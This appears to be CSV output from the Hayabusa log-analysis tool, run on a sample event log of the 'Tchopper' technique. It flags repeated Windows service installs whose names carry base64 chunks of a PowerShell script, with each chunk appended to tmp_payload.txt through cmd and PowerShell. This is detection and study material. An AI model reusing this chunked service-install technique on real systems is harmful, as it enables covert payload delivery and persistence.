2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
